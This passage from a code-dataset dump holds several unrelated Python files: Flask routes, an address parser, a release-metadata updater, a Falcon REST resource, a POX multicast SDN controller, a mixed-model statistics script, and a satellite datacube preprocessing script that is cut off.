create_artist_submission():\n \"\"\"\n create artist on form submission\n \"\"\"\n try:\n request.get_data()\n genres = request.form.getlist('genres')\n artist_dict = request.form.to_dict()\n seeking_venue = artist_dict['seeking_venue'] == \"True\"\n artist = Artist(name=artist_dict['name'], city=artist_dict['city'], state=artist_dict['state'],\\\n phone=artist_dict['phone'],\\\n facebook_link=artist_dict['facebook_link'],\\\n website_link=artist_dict['website_link'], image_link=artist_dict['image_link'],\\\n seeking_venue=seeking_venue, seeking_description=artist_dict['seeking_description'])\n artist.create(genres)\n flash('artist ' + request.form['name'] + ' was successfully listed!')\n except Exception as e:\n print(\"Error while creating new artist: \", e)\n print(traceback.format_exc())\n flash('An error occurred. artist ' + request.form['name'] + ' could not be listed.')\n abort(500)\n\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n \"\"\"Displays list of shows at /shows\"\"\"\n shows_raw = Show.query.all()\n data = []\n try:\n for show in shows_raw:\n show_dict = show.get_show_dict()\n if show_dict:\n data.append(show_dict) \n if len(data) == 0:\n print(\"No records found for shows\")\n abort(404)\n except Exception as e:\n print(\"Error occured in fetching shows: \",e)\n print(traceback.format_exc())\n abort(500)\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n \"\"\"\n Renders shows create form\n \"\"\"\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n \"\"\"\n Called to create new shows in the db, upon submitting new show listing form\n \"\"\"\n \n try:\n request.get_data()\n show_dict = request.form.to_dict()\n show = Show(venue_id=show_dict[\"venue_id\"], artist_id=show_dict[\"artist_id\"], start_time=show_dict[\"start_time\"])\n show.create()\n flash('Show was successfully listed!')\n return render_template('pages/home.html') \n except Exception as e:\n print(\"Error in creating new show: \", e)\n print(traceback.format_exc())\n flash('An error occurred. 
Show could not be listed.')\n abort(500)\n \n \n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"abira125/fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42563376803","text":"\"\"\"\nsplit_parser - Split-based Parser\n\nThis module provides the SplitParser class, which is responsible for splitting an address string based on specific\nkeywords such as \",\" or custom words like \"Flat,\" \"House,\" etc. The class uses string splitting methods to extract\nrelevant information such as street names and house numbers from the address.\n\nClasses:\n SplitParser - Class for splitting address strings based on specific keywords or custom words.\n\nFunctions:\n find_next_word\n comma_split_operation\n word_split_operation\n split_operation\n\n\"\"\"\n\nimport re\n\n\nclass SplitParser:\n def find_next_word(self, word: str) -> str:\n \"\"\"\n Find the next word following a given word in the address.\n\n Parameters:\n word (str): The word to find in the address.\n\n Returns:\n str: The next word after the given word, if found; otherwise, returns None.\n \"\"\"\n pattern = r'(?<=\\b' + re.escape(word) + r'\\b)\\s+(\\w+)'\n match = re.search(pattern, self.address, re.IGNORECASE)\n if match:\n return match.group(1)\n else:\n return None\n\n def comma_split_operation(self) -> dict:\n \"\"\"\n Split the address using a comma separator and extract street and house information.\n\n Returns:\n dict: A formatted dictionary containing the extracted street and house information.\n Example: {\"street\": \"Winterallee\", \"housenumber\": \"3\"}\n \"\"\"\n address_1, address_2 = self.address.split(self.get_split_by())\n address_1, address_2 = address_1.strip(), address_2.strip()\n if address_1[0].isdigit():\n self.house_address = address_1\n self.street_address = address_2\n elif address_2[0].isdigit():\n self.house_address = address_2\n self.street_address = address_1\n else:\n return self.parse_operation()\n\n return self.format_address()\n\n def word_split_operation(self) -> dict:\n \"\"\"\n Split the address using a custom word separator and extract street and house information.\n\n Returns:\n dict: A formatted dictionary containing the extracted street and house information.\n Example: {\"street\": \"Winterallee\", \"housenumber\": \"3\"}\n \"\"\"\n house_no = self.find_next_word(self.get_split_by())\n if house_no is None:\n return self.parse_operation()\n else:\n self.house_address = f\"{self.get_split_by()} {house_no}\"\n self.street_address = self.address.replace(self.house_address, \"\").replace(\",\", \"\") \\\n .replace(self.house_address.lower(), \"\").strip()\n\n return self.format_address()\n\n def split_operation(self) -> dict:\n \"\"\"\n 
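Editor's note: the `SplitParser.find_next_word` method in the record that follows relies on a fixed-width lookbehind — legal in Python's `re` because `\b` is zero-width and the escaped keyword is a fixed literal. A standalone sketch of the same trick (the sample string is hypothetical):

```python
import re

def next_word(text, word):
    # match the token immediately after `word`, case-insensitively
    pattern = r'(?<=\b' + re.escape(word) + r'\b)\s+(\w+)'
    m = re.search(pattern, text, re.IGNORECASE)
    return m.group(1) if m else None

print(next_word("Main Street House 24b", "House"))  # -> '24b'
```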
Perform address splitting based on the specified separator.\n\n Returns:\n dict: A formatted dictionary containing the extracted street and house information.\n \"\"\"\n if self.get_split_by() == \",\":\n return self.comma_split_operation()\n else:\n return self.word_split_operation()\n","repo_name":"Alvi-Rahman/FRIDAY_Assesment","sub_path":"parser/split_parser.py","file_name":"split_parser.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12878979322","text":"from datetime import datetime, timezone\nfrom json import load, dump\nimport os\nimport sys\n\ndest_type = sys.argv[1]\nversion = sys.argv[2]\ncommit_sha = sys.argv[3]\n\nurl_base = \"https://github.com/truchas/truchas_releases/releases/download\"\ntarball=\"truchas-%s-Linux.tar.bz2\" % version\ntarball_url = \"{url_base}/{version}/{tarball}\".format(\n url_base=url_base,\n version=version,\n tarball=tarball,\n )\n\nassert dest_type in [\"dev\", \"release\"]\nnow_utc = datetime.now(timezone.utc)\n\nfilename = \"data.json\"\nif not os.path.exists(filename):\n d = {\"data_file_version\": 1, \"dev\": [], \"release\": []}\n with open(filename, \"w\") as f:\n dump(d, f, indent=4, ensure_ascii=False, sort_keys=True)\n\nd = load(open(filename))\nassert d[\"data_file_version\"] == 1\nentry = {\n \"url\": tarball_url,\n \"filename\": tarball,\n \"version\": version,\n \"commit_sha\": commit_sha,\n \"created\": str(now_utc)\n}\nd[dest_type].append(entry)\nprint(\"Saving to %s.\" % filename)\nwith open(filename, \"w\") as f:\n dump(d, f, indent=4, ensure_ascii=False, sort_keys=True)\n","repo_name":"truchas/truchas","sub_path":"ci/tarball_update_json.py","file_name":"tarball_update_json.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"29176527168","text":"\"\"\"\n resources.models\n ~~~~~~~~~~~~~~~~\n\n Multiple models resource object with responders.\n\"\"\"\n\nimport falcon\nimport goldman\nimport goldman.signals as signals\n\nfrom ..resources.base import Resource as BaseResource\nfrom goldman.utils.responder_helpers import (\n from_rest,\n to_rest_model,\n to_rest_models,\n)\n\n\ndef on_get(resc, req, resp):\n \"\"\" Get the models identified by query parameters\n\n We return an empty list if no models are found.\n \"\"\"\n\n signals.pre_req.send(resc.model)\n signals.pre_req_search.send(resc.model)\n\n models = goldman.sess.store.search(resc.rtype, **{\n 'filters': req.filters,\n 'pages': req.pages,\n 'sorts': req.sorts,\n })\n\n props = to_rest_models(models, includes=req.includes)\n resp.serialize(props)\n\n signals.post_req.send(resc.model)\n signals.post_req_search.send(resc.model)\n\n\ndef on_post(resc, req, resp):\n \"\"\" Deserialize the payload & create the new single item \"\"\"\n\n signals.pre_req.send(resc.model)\n signals.pre_req_create.send(resc.model)\n\n props = req.deserialize()\n model = resc.model()\n\n from_rest(model, props)\n goldman.sess.store.create(model)\n\n props = to_rest_model(model, includes=req.includes)\n resp.last_modified = model.updated\n resp.location = '%s/%s' % (req.path, model.rid_value)\n resp.status = falcon.HTTP_201\n resp.serialize(props)\n\n signals.post_req.send(resc.model)\n signals.post_req_create.send(resc.model)\n\n\nclass Resource(BaseResource):\n \"\"\" Multiple items resource & responders \"\"\"\n\n DESERIALIZERS = [\n goldman.JsonApiDeserializer,\n ]\n\n SERIALIZERS = [\n 
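Editor's note: `tarball_update_json.py` above maintains a versioned JSON data file with a load-append-dump cycle, creating the file with a schema stub on first run. The pattern condensed ('releases.json' and the entry contents here are hypothetical):

```python
import json
import os

path = "releases.json"
if not os.path.exists(path):
    # first run: create the file with an empty, versioned schema
    with open(path, "w") as f:
        json.dump({"data_file_version": 1, "release": []}, f)

with open(path) as f:
    d = json.load(f)
assert d["data_file_version"] == 1          # refuse unknown schema versions
d["release"].append({"version": "1.2.3"})   # hypothetical new entry
with open(path, "w") as f:
    json.dump(d, f, indent=4, sort_keys=True)
```

The upfront version assert is what lets later tooling evolve the schema without silently misreading old files.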
goldman.CsvSerializer,\n goldman.JsonApiSerializer,\n ]\n\n def __init__(self, model, disable=None):\n\n self.model = model\n self.rondrs = [on_get, on_post]\n self.rtype = model.RTYPE\n\n super(Resource, self).__init__(disable)\n","repo_name":"sassoo/goldman","sub_path":"goldman/resources/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"30207846270","text":"from pox.core import core\nimport pox.openflow.libopenflow_01 as of\nfrom pox.lib.addresses import IPAddr\nimport pox.lib.packet as pkt\nfrom pox.lib.revent import EventHalt\n\nlog = core.getLogger()\n\nclass MulticastTrafficManager():\n def __init__(self):\n core.listen_to_dependencies(self, ['GraphBuilder','StreamerStateBuilder'])\n self.streamer_state_builder = None\n self.graph_builder = None\n self.flow_entries = {}\n \n def _handle_GraphBuilder_GraphStructureChanged(self, event):\n if self.graph_builder == None:\n self.graph_builder = event.get_graph_builder()\n \n log.info(\"Compute path invoked\")\n \n nodes = self.graph_builder.get_nodes()\n edges = self.graph_builder.get_edges()\n distances = self.graph_builder.get_distances()\n ports = self.graph_builder.get_ports()\n \n log.info(\"Nodes: \" + str(nodes))\n log.info(\"Edges: \" + str(edges))\n log.info(\"Distances: \" + str(distances))\n log.info(\"Ports: \" + str(ports))\n \n # Recompute and write out these groups\n if self.streamer_state_builder is not None:\n active_groups = self.streamer_state_builder.get_complete_groups()\n log.info(\"Flow entries before: \"+str(self.flow_entries))\n \n for group_key in active_groups.keys(): \n constructed_route = self.construct_routes(active_groups[group_key][\"members\"], active_groups[group_key][\"streamer\"])\n \n if self.flow_entries.has_key(group_key):\n self.remove_old_route(self.flow_entries[group_key], group_key)\n \n if len(constructed_route) != 0:\n self.write_route(constructed_route,group_key)\n \n self.validate_flow_entries(constructed_route,group_key)\n \n log.info(\"Flow entries after: \"+str(self.flow_entries))\n return EventHalt\n \n def _handle_StreamerStateBuilder_ActiveGroupStateChanged(self, event):\n group_key,streamer,members = event.get_group_data()\n \n log.info(\"Key:\"+str(group_key))\n log.info(\"Streamer:\"+str(streamer))\n log.info(\"Members:\"+str(members))\n \n if self.streamer_state_builder == None:\n self.streamer_state_builder = event.get_streamer_state_builder()\n \n constructed_route = self.construct_routes(members,streamer)\n log.info(\"Constructed path: \"+str(constructed_route))\n \n if self.flow_entries.has_key(group_key):\n self.remove_old_route(self.flow_entries[group_key], group_key)\n \n if len(constructed_route) != 0:\n self.write_route(constructed_route,group_key)\n \n self.validate_flow_entries(constructed_route,group_key)\n \n log.info(\"Flow entries: \"+str(self.flow_entries))\n \n def _handle_StreamerStateBuilder_ActiveGroupDeleted(self, event):\n log.info(\"Group deleted event handler in multicast\")\n log.info(\"FLow entries before: \"+str(self.flow_entries))\n if self.streamer_state_builder == None:\n self.streamer_state_builder = event.get_streamer_state_builder()\n \n group_key = event.get_group_key()\n if self.flow_entries.has_key(group_key):\n self.remove_old_route(self.flow_entries[group_key], group_key)\n self.flow_entries.pop(group_key)\n \n log.info(\"FLow entries after: \"+str(self.flow_entries))\n \n \n def 
_handle_StreamerStateBuilder_IncompleteGroupStateChanged(self, event):\n log.info(\"Group incomplete block/unblock event handler in multicast\")\n \n group_key,streamer,flag = event.get_group_data()\n self.send_incomplete_group_message(group_key, streamer, flag)\n \n \n def construct_routes(self, group_members, group_streamer):\n min_cost_tree = self.graph_builder.minimal_cost_spanning_tree(group_members, group_streamer)\n constructed_routes = self.graph_builder.construct_routes(min_cost_tree,group_members)\n \n log.info(\"Min cost tree: \"+str(min_cost_tree))\n \n return constructed_routes\n \n def validate_flow_entries(self, constructed_route, group_key):\n if len(constructed_route) != 0:\n if self.flow_entries.has_key(group_key):\n self.flow_entries[group_key] = constructed_route\n else:\n self.flow_entries.update({group_key:constructed_route})\n else:\n if self.flow_entries.has_key(group_key):\n self.flow_entries.pop(group_key)\n \n def remove_old_route(self, old_route, group_key):\n for node in old_route.keys():\n msg = of.ofp_flow_mod()\n msg.priority = 65535\n msg.command = of.OFPFC_DELETE\n msg.match.dl_type = 0x800\n msg.match.nw_dst = IPAddr(group_key[0])\n msg.match.nw_src = IPAddr(group_key[1])\n try:\n core.openflow.getConnection(node).send(msg)\n except AttributeError:\n log.info(\"Core is going down, can't post update for this node\")\n \n def write_route(self, constructed_route, group_key):\n for node in constructed_route.keys():\n msg = of.ofp_flow_mod()\n msg.priority = 65535\n msg.match.dl_type = 0x800\n msg.match.nw_dst = IPAddr(group_key[0])\n msg.match.nw_src = IPAddr(group_key[1])\n for out_port in constructed_route[node]:\n msg.actions.append(of.ofp_action_output(port = out_port))\n try:\n core.openflow.getConnection(node).send(msg)\n except AttributeError:\n log.info(\"Core is going down, can't post update for this node\") \n \n def send_incomplete_group_message(self,group_key,streamer,flag):\n msg = of.ofp_flow_mod()\n msg.priority = 65535\n msg.match.dl_type = 0x800\n if flag == 'UNBLOCK':\n msg.command = of.OFPFC_DELETE\n msg.match.nw_dst = IPAddr(group_key[0])\n msg.match.nw_src = IPAddr(group_key[1])\n msg.actions = []\n try:\n log.info(\"Incomplete group message sent out with flag \"+str(flag))\n core.openflow.getConnection(streamer).send(msg)\n except AttributeError:\n log.info(\"Core is going down, can't post update for this node\")\n\ndef launch():\n multicast_traffic_manager = MulticastTrafficManager()\n core.register(\"MulticastTrafficManager\", multicast_traffic_manager)\n","repo_name":"matyi25/multicast_sdn_thesis","sub_path":"multicast_traffic_manager.py","file_name":"multicast_traffic_manager.py","file_ext":"py","file_size_in_byte":6695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23563836860","text":"from scipy.integrate import quad\nimport matplotlib.pyplot as plt\nimport scipy.stats\nimport numpy as np\nimport pandas as pd\nimport patsy\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.tools.sm_exceptions import ConvergenceWarning\n\n### Construction du graphique des deux gaussiennes\n\nx_min = -5.0\nx_max = 10\n\nmean = 0 \nstd = 1.0\n\nmean2 = 1.0\nstd2 = 2.0\n\nx = np.linspace(x_min, x_max, 100)\n\ny1 = scipy.stats.norm.pdf(x,mean,std)\ny2 = scipy.stats.norm.pdf(x,mean2,std2)\n\nplt.plot(x,y1, color='coral', label = 'distribution normale centrée réduite')\nplt.plot(x,y2, color='blue', label = 'distribution avec des estimateurs 
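Editor's note: the `write_route` method above shows the POX flow-mod idiom. A reduced sketch of the same construction (runs only inside a POX controller; `dpid`, `group_ip`, `src_ip`, and `out_ports` are hypothetical arguments). Matching on `dl_type` 0x800 restricts the rule to IPv4 before the `nw_src`/`nw_dst` fields are consulted:

```python
import pox.openflow.libopenflow_01 as of
from pox.lib.addresses import IPAddr
from pox.core import core

def install_multicast_rule(dpid, group_ip, src_ip, out_ports):
    msg = of.ofp_flow_mod()
    msg.priority = 65535
    msg.match.dl_type = 0x800            # IPv4 only
    msg.match.nw_dst = IPAddr(group_ip)  # multicast group address
    msg.match.nw_src = IPAddr(src_ip)    # the streamer
    for port in out_ports:               # replicate to every subscribed port
        msg.actions.append(of.ofp_action_output(port=port))
    core.openflow.getConnection(dpid).send(msg)
```

Deletion works the same way with `msg.command = of.OFPFC_DELETE` and an empty action list, as the manager's `remove_old_route` does.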
biaisés')\n\nplt.grid()\n\nplt.xlim(x_min,x_max)\nplt.ylim(0,0.5)\n\nplt.title('Comparaison de deux gaussiennes',fontsize=10)\n\nplt.legend()\n\nplt.xlabel('x')\nplt.ylabel('Densité')\n\nplt.savefig(\"normal_distribution.png\")\n\n### Création du jeu de données proposé dans l'article \n\ndata = np.array([[0, 10, 1], [1, 25, 1], [0, 3, 2], [1, 6, 2]])\ndf = pd.DataFrame(data, columns = ['Treat', 'Resp', 'Ind'])\n\n### représentation graphique du jeu de données proposé dans l'article \n\nplt.style.use('ggplot')\nplt.scatter(df.Treat, df.Resp, c=df.Ind)\nplt.plot(df.Treat.iloc[0:2], df.Resp.iloc[0:2], '-', c='purple', label = '1')\nplt.plot(df.Treat[2:4], df.Resp.iloc[2:4], '-', c='yellow', label='2')\nplt.xlabel('Treat')\nplt.ylabel('Resp')\nplt.legend(title = 'Ind')\nplt.savefig(\"points.png\")\n\n### modèle linéaire par régression des moindres carrés (OLS)\n\nresults_ols = smf.ols('Resp ~ Treat', data=df).fit()\nresults_ols.summary()\n\n# Le maximum de vraisemblance vaut -13.549\n# beta1 = 6.5 \n# beta2 = 6.5 + 9 = 15.5\n\n\n### Modèle Linéaire mixte par ML\n\nmodel_mixte_ml = smf.mixedlm(\"Resp ~ Treat\", df, groups = df['Ind'])\nresult_ml = model_mixte_ml.fit(reml=False)\nprint(result_ml.summary())\n\n# Le maximum de vraisemblance vaut -13.0029\n# on trouve les mêmes valeurs de beta\n# de plus on note que sigma^2 = sqrt(18) = 4.24\n# sigma^2_s = sqrt(33.25) = 5.77\n\n\n### Modèle linéaire mixte par REML\n\nmodel_mixte_reml = smf.mixedlm('Resp ~ Treat', data=df, groups = df['Ind'])\nresult_reml = model_mixte_reml.fit()\nresult_reml.summary()\n\n# Le maximum de vraisemblance vaut -7.8877\n# la différence entre les deux vraisemblances est expliquée dans le rapport\n# on trouve les mêmes valeurs de beta\n# de plus on note que sigma^2 = sqrt(36) = 6\n# sigma^2_s = sqrt(66.5) = 8.15\n\n\n### Calcul de la log-vraisemblance\n\ndef f(x):\n sigma = x[0]\n sigmas = x[1]\n beta1 = 6.5\n beta2 = 15.5\n y11 = 3\n y12 = 10\n y21 = 6\n y22 = 25\n return(-(1/2)*np.log(4*sigmas**4*sigma**4 +\n 4*sigmas**2*sigma**6 + sigma**8) -(1/2)*np.log(4/((sigma**2)*(sigma**2+2*sigmas**2)))- \n (1/2)*(1/((sigma**2)*(sigma**2+2*sigmas**2)))*(((y11-beta1)**2)*(sigma**2+sigmas**2) - \n 2*(y11-beta1)*(y21-beta2)*(sigmas**2) + \n ((y21-beta2)**2)*(sigma**2+sigmas**2) + \n ((y12-beta1)**2)*(sigma**2+sigmas**2) - \n 2*(y12-beta1)*(y22-beta2)*(sigmas**2) + \n ((y22-beta2)**2)*(sigma**2+sigmas**2)))\n\n### Maximisation de la log-vraisemblance\n\nsigma_chap=0 # on initialise \\hat{\\sigma^2}\nsigma_s_chap=0 # on initialise \\hat{\\sigma_s^2}\nLL = -10.0 # on initialise la log-vraisemblance\nliste = np.arange(-10, 10, 0.01) #on prend un pas de 0.01 pour sigma_s^2\n#un pas de 1 suffit pour sigma^2\nfor x in range(-10,10):\n for y in liste:\n if LL < f([x,y]) : \n sigma_chap = x\n sigma_s_chap = y\n LL = f([x,y])\n \nprint(\"Le maximum de la log vraisemblance est\",LL)\nprint(\"sigma^2 vaut\",sigma_chap, \"et sigma_s^2 vaut\",sigma_s_chap)\n\n# On trouve les bonnes valeurs de sigma \n","repo_name":"MegDie/ML_VS_REML","sub_path":"Illustrations.py","file_name":"Illustrations.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40788918159","text":"import module_cube as hz\nimport numpy as np\nimport rasterio\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport rioxarray as rxr\nimport geopandas as gpd\nfrom shapely.geometry import mapping\n\nif __name__ == \"__main__\":\n\n ''' 
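Editor's note: the ML_VS_REML script above maximizes its log-likelihood `f([sigma, sigma_s])` by brute-force grid search over a fixed lattice. A continuous optimizer is a natural alternative; a hedged sketch assuming the script's `f` is in scope (the starting point is an arbitrary guess near the expected solution):

```python
from scipy.optimize import minimize

# minimize the negated log-likelihood == maximize f
res = minimize(lambda x: -f(x), x0=[4.0, 5.0], method='Nelder-Mead')
sigma_hat, sigma_s_hat = res.x
print("max log-likelihood:", -res.fun)
```

This trades the grid's guaranteed coverage for speed and resolution; with a multimodal surface the grid search remains the safer check.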
----------------------------------------------------------------------------------------------------------------\n----------------------------------------1. Load raw dataset ---------------------------------------------------------'''\n\n # Create a path to the data directory\n path_data = \"../../data/final/\"\n\n # Load the data set\n ndvi = xr.open_dataset(path_data + 'final_ndvi_16D_1km.nc')\n lai = xr.open_dataset(path_data + 'final_lai_8D_500m.nc')\n evap = xr.open_dataset(path_data + 'final_evap_8D_500m.nc')\n era = xr.open_dataset(path_data + 'Raw_weather_4H_9km.nc')\n lst_night = xr.open_dataset(path_data + 'final_lst_night_1D_1km.nc')\n lst_day = xr.open_dataset(path_data + 'final_lst_day_1D_1km.nc')\n active_fire = xr.open_dataset(path_data + 'final_active_fire_1M_500m.nc')\n burn_mask = xr.open_dataset(path_data + 'final_fire_mask_1M_1km.nc')\n fwi = xr.open_mfdataset(path_data + '/Raw_Fwi/*.nc', combine='by_coords', chunks=None)\n density = rxr.open_rasterio(path_data + 'fra_pd_2015_1km_UNadj.tif', masked=True).squeeze()\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------2. Select variables of interest ------------------------------------------------'''\n # Select the variables of interest\n ndvi_filter = ndvi['_1_km_16_days_EVI']\n lai_filter = lai['Fpar_500m']\n evap_filter = evap['ET_500m']\n era_filter = era[['u10', 'v10', 't2m', 'tp']]\n lst_night_filter = lst_night['LST_Night_1km']\n lst_day_filter = lst_day['LST_Day_1km']\n active_fire_filter = active_fire[['First_Day', 'Last_Day', 'Burn_Date']]\n burn_mask_filter = burn_mask['FireMask']\n\n ''' ----------------------------------------------------------------------------------------------------------------\n----------------------------------------3. Select duration -------------------------------------------------------\n\n 1) Harmonize the datacube to the same calendar: Julian calendar\n 2) Select the period of interest: 2010-2021\n \n 1) Harmonize the datacube to the same calendar: Julian calendar'''\n era_filter = era_filter.convert_calendar('julian')\n\n \"\"\" 2) Select the period of interest: 2010-2021\"\"\"\n ndvi_filter = ndvi_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n lai_filter = lai_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n evap_filter = evap_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n era_filter = era_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n lst_night_filter = lst_night_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n lst_day_filter = lst_day_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n active_fire_filter = active_fire_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n burn_mask_filter = burn_mask_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------4. 
Fill the missing values ------------------------------------------------\n\n 1) Quadratic interpolation for the land surface temperature because of high number of missing values (more than 50%)\n 2) Linear interpolation for variables from era5 which have around 20% of missing values\n 3) Forwardfill for the other variables which have less than 10% of missing values and are categorical variables'''\n\n ''' 1) Quadratic interpolation '''\n lst_day_filter = lst_day_filter.interpolate_na(dim='time', method='quadratic').ffill(dim='xdim').ffill(dim='ydim')\n lst_night_filter = lst_night_filter.interpolate_na(dim='time', method='quadratic').ffill(dim='xdim').ffill(\n dim='ydim')\n\n ''' 2) Linear interpolation '''\n era_filter = era_filter.interpolate_na(dim='time', method='linear').ffill(dim='xdim').ffill(dim='ydim')\n\n ''' 3) Forwardfill '''\n ndvi_filter = ndvi_filter.ffill(dim='time').ffill(dim='xdim').ffill(dim='ydim')\n lai_filter = lai_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n evap_filter = evap_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n active_fire_filter = active_fire_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n burn_mask_filter = burn_mask_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n density = density.ffill(dim='x', limit=None).ffill(dim='y', limit=None)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------5. Writing CRS ---------------------------------------------------------------\n\n 1) Create a CRS object from a poj4 string for sinuoidal projection\n 2) Set the CRS of the data sets with hz.define_crs()'''\n\n ''' 1) Create a CRS object from a poj4 string for sinuoidal projection'''\n crs_sinu = rasterio.crs.CRS.from_string(\n \"+proj=sinu +lon_0=0 +x_0=0 +y_0=0 +a=6371007.181 +b=6371007.181 +units=m +no_defs\")\n\n ''' 2) Set the CRS of the data sets with hz.define_crs()'''\n ndvi_filter = hz.define_crs(ndvi_filter, crs_sinu)\n lai_filter = hz.define_crs(lai_filter, crs_sinu)\n evap_filter = hz.define_crs(evap_filter, crs_sinu)\n era_filter = hz.define_crs(era_filter, 4326)\n lst_night_filter = hz.define_crs(lst_night_filter, crs_sinu)\n lst_day_filter = hz.define_crs(lst_day_filter, crs_sinu)\n active_fire_filter = hz.define_crs(active_fire_filter, crs_sinu)\n burn_mask_filter = hz.define_crs(burn_mask_filter, crs_sinu)\n density = hz.define_crs(density, 4326)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------6. Clipping to the AOI ------------------------------------------------\n\n 1) Define the AOI\n 2) Clip the data sets to the AOI'''\n\n ''' 1) Define the AOI'''\n aoi = hz.define_area_of_interest(path_data + 'Large.zip')\n\n ''' 2) Clip the data sets to the AOI'''\n era_filter = hz.clip_to_aoi(era_filter, aoi)\n density = hz.clip_to_aoi(density, aoi)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------7. 
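Editor's note: the gap-filling step above chains `interpolate_na` along time with forward fills along the spatial dims. A toy illustration of those xarray calls (xarray's `ffill` needs the bottleneck package installed):

```python
import numpy as np
import xarray as xr

da = xr.DataArray(
    [[1.0, np.nan, 3.0],
     [np.nan, 5.0, np.nan]],
    dims=("x", "time"),
    coords={"time": [0, 1, 2]},
)
# time interpolation only fills gaps *between* valid points;
# the spatial ffill then covers what remains at the edges
filled = da.interpolate_na(dim="time", method="linear").ffill(dim="x")
```

This is why the cube pipeline always pairs the interpolation with `ffill` on `xdim`/`ydim`: boundary NaNs survive pure time interpolation.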
Projection ------------------------------------------------\n\n 1) Define a common grid to project the data sets\n 2) Projection of the Era5 data set\n 2.1 Downsample era5 first to daily data decrease the computational time\n 2.2 Project the downsampled data set to the same crs as the common grid\n 2.3 Rename the dimensions in order to project the data set to the common grid\n 2.4 Project to the common grid\n 3) Projection of the density dataaray\n 3.1 Create a name for the data array\n 3.2 Change the array into a data set\n 3.3 Project the data set to the common grid \n 4) Projection of the other data sets'''\n\n ''' 1) Define a common grid to project the data sets'''\n common_grid = rxr.open_rasterio(path_data + 'final_lst_day_1D_1km.nc').isel(time=0)\n\n ''' 2) Projection of the Era5 data set'''\n ''' 2.1 Downsample era5 first to daily data decrease the computational time'''\n era_filter_daily = hz.resample_to_daily(era_filter)\n\n ''' 2.2 Project the downsampled data set to the same crs as the common grid'''\n era_sinu = era_filter_daily.rio.reproject(crs_sinu)\n\n ''' 2.3 Rename the dimensions in order to project the data set to the common grid'''\n era_filter_proj = era_sinu.rename({'y': 'ydim', 'x': 'xdim'})\n\n ''' 2.4 Project to the common grid'''\n era_filter_proj = hz.interpolate_to_common_grid(era_sinu, common_grid)\n\n ''' 3) Projection of the density dataaray \n 3.1 Create a name for the data array'''\n density.name = 'density'\n\n ''' 3.2 Change the array into a data set'''\n density = density.to_dataset()\n\n ''' 3.3 Project the data set to the common grid '''\n density_proj = hz.interpolate_to_common_grid(density, common_grid)\n\n ''' 4) Projection of the other data sets'''\n lai_filter_proj = hz.interpolate_to_common_grid(lai_filter, common_grid)\n\n evap_filter_proj = hz.interpolate_to_common_grid_categorical(evap_filter, common_grid)\n\n # Different method to interpolate the active fire data set because of the different data type\n active_fire_filter_proj = active_fire_filter.interp(ydim=ndvi[\"ydim\"], xdim=ndvi['xdim'])\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-----------------------------------------8. 
Resampling to daily -----------------------------------------------------'''\n # Resample to daily\n ndvi_filter_daily = hz.resample_to_daily(ndvi_filter)\n burn_mask_filter_daily = hz.resample_to_daily_categorical(burn_mask_filter)\n lai_filter_proj_daily = hz.resample_to_daily(lai_filter_proj)\n evap_filter_proj_daily = hz.resample_to_daily_categorical(evap_filter_proj)\n active_fire_filter_proj_daily = hz.resample_to_daily(active_fire_filter_proj)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n------------------------------- 9 Prepare the datasets for merging --------------------------------------------\n\n Prepare the datasets for merging:\n 1) Delete the attribute grid_mapping: unecessary and conflictual\n 2) Create the two list from the name of the coordinates \n 3) Match the coordinates values of the data sets to match the other data sets\n 4) Rename the coordinates of the data sets to match the other data sets\n 5) Merge the data sets'''\n\n '''1) Delete the attribute grid_mapping: unnecessary and conflictual'''\n 